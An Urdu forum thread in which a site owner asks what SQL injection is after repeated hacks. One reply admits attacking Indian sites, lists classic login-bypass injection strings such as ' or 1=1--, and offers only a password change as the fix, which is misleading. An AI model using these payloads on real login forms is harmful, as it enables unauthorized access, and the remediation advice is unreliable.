راشد احمد

محفلین
پچھلے دنوں میری ایک ویب سائٹ ہیک ہوگئ تھی۔ میں ویب سائٹ کو دوبارہ ٹھیک کرتا توپھر ہیک ہوجاتی تھی۔ میں نے ایک جگہ پڑھا تھا کہ اگر کسی ویب سائٹ میں‌sql injection ہوتو اس ویب سائٹ کے ہیک ہونے کے چانسز زیادہ ہوتے ہیں۔

اب مجھے sql injection کیا ہوتی ہے اور اسے کیسے دور کرتے ہیں۔
 

عسکری

معطل
پچھلے دنوں میری ایک ویب سائٹ ہیک ہوگئ تھی۔ میں ویب سائٹ کو دوبارہ ٹھیک کرتا توپھر ہیک ہوجاتی تھی۔ میں نے ایک جگہ پڑھا تھا کہ اگر کسی ویب سائٹ میں‌sql injection ہوتو اس ویب سائٹ کے ہیک ہونے کے چانسز زیادہ ہوتے ہیں۔

اب مجھے sql injection کیا ہوتی ہے اور اسے کیسے دور کرتے ہیں۔

ویسے اللہ جانتا ہے میں نے ہیک نہیں کی آپ کی سائٹ پر مجھے آتا ہے ایس کیو ایل کرنا اور کئی بار انڈین سائٹ پر کیا بھی۔یہ سادہ لفظوں میں سمجھاتا ہوں ایک ڈیفالٹ سیکیورتی کوڈ سے ایڈمن لاگن کرنا ہوتا ہے

اس طرح کے پاس ورڈ یوز کر کے انجکٹ کیا جا سکتا ہے۔اور بھئی کئی طریقے ہیں۔


1'or'1'='1 or admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ...
0 or 0 = 0 0 or 1 = 1 1 or 0 = 1 1 or 1 = 1


کسی سائٹ کو اور لوگن ہو کے ایڈمن پیج پر تبدیلی کی جا سکتی ہے اپنی سیکیورٹی کود پاس ورڈ تبدیل کرو بھائی جی۔
 
Top